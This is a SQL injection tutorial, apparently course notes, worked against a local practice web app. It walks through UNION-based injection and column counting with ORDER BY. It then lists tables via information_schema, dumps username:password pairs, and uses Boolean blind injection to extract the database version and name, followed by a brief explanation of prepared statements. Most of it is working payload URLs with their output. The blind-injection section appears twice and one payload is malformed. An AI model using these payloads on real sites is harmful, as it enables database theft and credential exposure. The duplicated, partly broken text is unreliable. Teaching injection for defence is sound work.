Introduction:-
With help of “UNION” operator and “ORDER BY” clause and attacker is able to dump the entire database from the web application vulnerable to SQL injection.
Attacker Form
- App sends form to user.
- Attacker submits a form with SQL exploit data.
- Application builds string with exploit data.
- Application sends SQL query to DB.
- DB executes query, including exploit, sends data back to application.
- Application returns data to user.
Injecting into SELECT
Most common SQL entry point.
SELECT columns
FROM table
WHERE expression
ORDER BY expression
Places where user input is inserted:
WHERE expression
ORDER BY expression
Table or column names
UNION
Combines SELECTs into one result.
SELECT cols FROM table WHERE expr
UNION
SELECT cols2 FROM table2 WHERE expr2
Allows attacker to read any table
‘user’ UNION SELECT number FROM cc--
Requirements
Results must have same number and type of columns.
Attacker needs to know name of other table.
DB returns results with column names of 1st query.
Finding #columns with NULL
‘ UNION SELECT NULL--
‘ UNION SELECT NULL, NULL--
‘ UNION SELECT NULL, NULL, NULL--
Finding #columns with ORDER BY
‘ ORDER BY 1--
‘ ORDER BY 2--
‘ ORDER BY 3--
Finding a string column to extract data
‘ UNION SELECT ‘a’, NULL, NULL—
‘ UNION SELECT NULL, ‘a’, NULL--
‘ UNION SELECT NULL, NULL, ‘a’--
Inference Attacks
Problem: What if app doesn’t print data?
Injection can produce detectable behavior
Successful or failed web page.
Noticeable time delay or absence of delay.
Identify an exploitable URL
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1 and 1=1
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1 and 1=2
Use condition to identify one piece of data
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2
... or use binary search technique ...
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5
You can also specify column number instead of column name.
Sample:
SELECT * FROM users order by 2
Result:
| Id | Name |
| 1 | Malik |
| 2 | John |
| 3 | David |
INFORMATION_SCHEMA
1. Information database stores information about all the other databases that the MySQL server maintains.
Getting Information from Information_Schema database:
select * from information_schema.tables
Listing only tables of currently selected database.
Select table_name from information_schema.tables where table_schema=database()
Here we can get all column of specific database.
Select column_name from information_schema.columns where table_name=’users’
Web page:
}Here, we have a page that displays post contents based on a given ID.
}When Id is equal to “1”. It displays the following content.
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1
Display:-
Subject
|
First Post
|
Messaged by
|
Admin
|
}When Id is equal to “2”. It displays the following content.
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2
Display:-
Subject
|
Second Post
|
Messaged by
|
Admin
|
}We already know, UNION operator only works if the number of columns are equal.
}So, we need tyo find the number of columns that is currently being Selected.
}To achieve that, we will be using “ORDER BY” clause.
Finding number of columns:
Order by 1
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 1
Some message will be displayed…
Order by 2
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 2
Some message will be displayed…
Order by 3
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 3
Some message will be displayed…
Order by 4
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 4
Some message will be displayed…
Order by 5
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 5
You will get an error message, unknown column name ‘5’ in order clause.
}When we try to send “ORDER BY 5’ query, we are getting ‘unknown column’ error message.
}It indicates results of the SELECT statement has only ‘4’ columns.
}Then use the UNION to execute our own SELECT statement.
Display message:-
| Subject | 3 |
| Messaged by | 4 |
Getting MySQL username:
Request:
Example:
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union select 1,2,user(),4
Display message:-
| Subject | root@localhost |
| Messaged by | 4 |
Getting List of tables:
Request:
Example:
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union
select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()
Display message:-
| Subject | cards,fileslist,form_post,messages,tdata,user_master,usermessages |
| Messaged by | 4 |
Dumping Data:
Let’s dump username, passwords from the 'user_master' table
Request:
}Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union select 1,2,group_concat(username,':',password),4 from user_master
Messaged by 4
Blind Injection:
Blind SQL Injection is a type of SQL injection vulnerability in which web application will be vulnerable to SQL Injection but results of Injection won’t be displayed.
Boolean based blind SQL Injection:
}By sending true or false queries to the server, an attacker is able to compromise the entire database.
}By compromising the response to the True query with the response to the False query, an attacker can do Blind SQL injection.
Boolean operator
1=1 Ã true
1=2 Ã false
To download file:
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=2 and 1=1
Determining database server version:
1. Checking whether database server version is 4.x
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=4
Display message:
File not found
2. Checking whether database server version is 5.x
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=5
Blind SQL Injection is a type of SQL injection vulnerability in which web application will be vulnerable to SQL Injection but results of Injection won’t be displayed.
Boolean based blind SQL Injection:
}By sending true or false queries to the server, an attacker is able to compromise the entire database.
}By compromising the response to the True query with the response to the False query, an attacker can do Blind SQL injection.
Boolean operator
1=1 Ã true
1=2 Ã false
To download file:
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=2 and 1=1
Determining database server version:
1. Checking whether database server version is 4.x
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=4
Display message:
File not found
2. Checking whether database server version is 5.x
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=5
database version=5 then PDF file will be downloaded.
Determining length of Database name:
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=x
x- length of database name
1. checking database name length is 1
http:// localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=1
Display message:
File not found
2. checking database name length is 3
localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=3
Display message:
File not found
3. checking database name length is 6
localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=6
database name length=6 then PDF file will be downloaded.
Determining first character of Database name:
localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’x’
Here, x is First character of database name
1. checking whether database first character is ‘a’
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database())=’a’
Display message:
Oops, Something Went wrong
2. checking whether database first character is ‘b’
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’b’
Display message:
File not found
Determining length of Database name:
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=x
x- length of database name
1. checking database name length is 1
http:// localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=1
Display message:
File not found
2. checking database name length is 3
localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=3
Display message:
File not found
3. checking database name length is 6
localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=6
database name length=6 then PDF file will be downloaded.
Determining first character of Database name:
localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’x’
Here, x is First character of database name
1. checking whether database first character is ‘a’
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database())=’a’
Display message:
Oops, Something Went wrong
2. checking whether database first character is ‘b’
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’b’
Display message:
File not found
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’h’
database name first letter is ‘h’ then Pdf file will be downloaded.
Like wise we can get 2nd , 3rd , 4th , 5th and 6th letters. Because total length of database name is 6.
An successful exploitation , attacker can get database name(hackdb).
}
How does this prevent an attack?
- The SQL statement you pass to prepare is parsed and compiled by the database server.
- By specifying parameters (either a ? or a named parameter like :name) you tell the database engine what to filter on.
- Then when you call execute the prepared statement is combined with the parameter values you specify.
- It works because the parameter values are combined with the compiled statement, not a SQL string.
- SQL injection works by tricking the script into including malicious strings when it creates SQL to send to the database. So by sending the actual SQL separately from the parameters, you limit the risk of ending up with something you didn't intend.
